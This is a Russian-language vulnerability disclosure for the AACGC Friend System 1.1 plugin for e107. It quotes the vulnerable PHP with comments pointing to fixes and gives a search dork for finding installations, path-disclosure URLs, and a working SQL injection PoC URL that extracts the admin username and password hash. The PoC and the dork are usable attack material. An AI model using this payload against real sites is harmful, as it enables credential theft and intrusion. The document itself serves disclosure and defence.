AACGC Friend System v.1.1 - плагин e107
скачать с plugins.e107.org
inurl:/e107_plugins/aacgc_friendsys/
Path disclosure
display_errors = on
PoC
Код:
http://[host]/[path]//e107_plugins/aacgc_friendsys/admin_menu.php
http://[host]/[path]/e107_plugins/aacgc_friendsys/User_Friend_List_menu.php
SQL inj
Условия: magic_quotes_gpc = Off; нужно быть авторизированным.
/e107_plugins/aacgc_friendsys/Friend_Requests.php
PHP код:
/*...*/
// Friend_Requests.php (excerpt as quoted): everything below runs only for a logged-in user (USER).
if (USER){
    // Optional "gold" integration; the gold class is not shown on this page.
    if ($pref['fl_enable_gold'] =="1")
    {$gold_obj = new gold();}
    /*...*/
    if (isset($_POST['accept_user'])){
        // Both values are taken verbatim from the POST body: no cast, no escaping.
        // Nothing in the quoted lines ties user_id to USERID, so the row written
        // need not belong to the requesting user.
        $newuser=$_POST['user_id'];
        $newfriend=$_POST['user_friends'];
        /*...*/
        // db_Insert is called with its *string* form, which the handler pastes
        // verbatim after "VALUES". The only quoting is the literal single quotes
        // built here; with magic_quotes_gpc off nothing escapes the POST values,
        // so this is the SQL injection point. Fix: cast both values to int before
        // use (or escape them explicitly) rather than concatenating them.
        // `or die(mysql_error())` additionally returns the raw MySQL error text to the client.
        $sql->db_Insert("aacgc_friend_sys", "NULL, '".$newuser."', '".$newfriend."'") or die(mysql_error());
        /*...*/
/e107_handlers/mysql_class.php
PHP код:
/*...*/
/**
 * Build and execute an INSERT into MPREFIX.$table (db_IsLang, db_Query and
 * dbError are defined elsewhere in this class and are not shown here).
 *
 * $arg is either
 *   - an array column => value: keys are wrapped in backticks and values in
 *     single quotes, but NO escaping is applied to either, so the caller must
 *     escape every value; or
 *   - a string, which is pasted verbatim after "VALUES" — the caller is fully
 *     responsible for its content.
 *
 * Returns the new auto-increment id, TRUE when the table has none, or FALSE
 * on failure (after dbError() has been handed the full query text).
 * Uses the legacy mysql_* extension (removed in PHP 7).
 */
function db_Insert($table, $arg, $debug=FALSE, $log_type='', $log_remark='') {
    $table = $this->db_IsLang($table);
    $this->mySQLcurTable = $table;
    if(is_array($arg))
    {
        // Quoting only: implode() does not escape embedded quotes or backslashes.
        $keyList = "`".implode("`,`", array_keys($arg))."`";
        $valList = "'".implode("','", $arg)."'";
        $query = "INSERT INTO `".MPREFIX."{$table}` ({$keyList}) VALUES ({$valList})";
    }
    else
    {
        // Raw SQL fragment from the caller, interpolated as-is.
        $query = 'INSERT INTO '.MPREFIX."{$table} VALUES ({$arg})";
    }
    if(!$this->mySQLaccess)
    {
        // Fall back to the globally shared connection handle.
        global $db_ConnectionID;
        $this->mySQLaccess = $db_ConnectionID;
    }
    // $result is used only for the truth test; the handle is kept in mySQLresult.
    if ($result = $this->mySQLresult = $this->db_Query($query, NULL, 'db_Insert', $debug, $log_type, $log_remark)) {
        $tmp = mysql_insert_id($this->mySQLaccess);
        return ($tmp) ? $tmp : TRUE; // return true even if table doesn't have auto-increment.
    } else {
        // The full statement, including any caller-supplied data, goes to the error handler.
        $this->dbError("db_Insert ($query)");
        return FALSE;
    }
}
/*...*/
PoC
SQL inj
Надо быть авторизированным.
/e107_plugins/aacgc_friendsys/AddMe.php
Код:
// AddMe.php (excerpt as quoted). class2.php is the e107 bootstrap; USER, USERID,
// e_QUERY, HEADERF, $sql and the db class are presumably defined there — not shown here.
require_once("../../class2.php");
require_once(HEADERF);
// e_QUERY is split on '.' into action.sub_action.id. There is no segment-count
// or type check: fewer than three segments leave $sub_action / $id undefined.
if (e_QUERY) {
$tmp = explode('.', e_QUERY);
$action = $tmp[0];
$sub_action = $tmp[1];
$id = $tmp[2];
unset($tmp);
}
if (USER){
$sql->db_Select("aacgc_friend_sys", "*", "WHERE user_id = ".USERID."","");
$row = $sql->db_Fetch();
$sql2 = new db;
// $sub_action comes straight from the query string and is interpolated into the
// WHERE clause unquoted and uncast: this is the injection point. Casting it
// (`$sub_action = (int) $tmp[1];` above, or intval() here) would close it.
$sql2->db_Select("user", "*", "WHERE user_id = $sub_action ","");
$row2 = $sql2->db_Fetch();
// Debug leftover: dumps every column of the fetched user row into the response.
print_r($row2);
//----------------------------------------------
/*...*/
// user_name is appended to the page text unescaped; whatever the query above
// returned in that column is echoed to the client. $text is not initialised in this excerpt.
$text .= "
Are You Sure You Want To Add ".$row2['user_name']." To Your Friends List?
";
/*...*/
PoC:
Код:
http://[host]/[path]/e107_plugins/aacgc_friendsys/AddMe.php?0.1%20and%200%20union%20select%201,concat_ws%280x3a,user_loginname,user_password%29,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31%20from%20e107_user%20limit%200,1
Are You Sure You Want To Add admin:21232f297a57a5a743894a0e4a801fc3 To Your Friends List?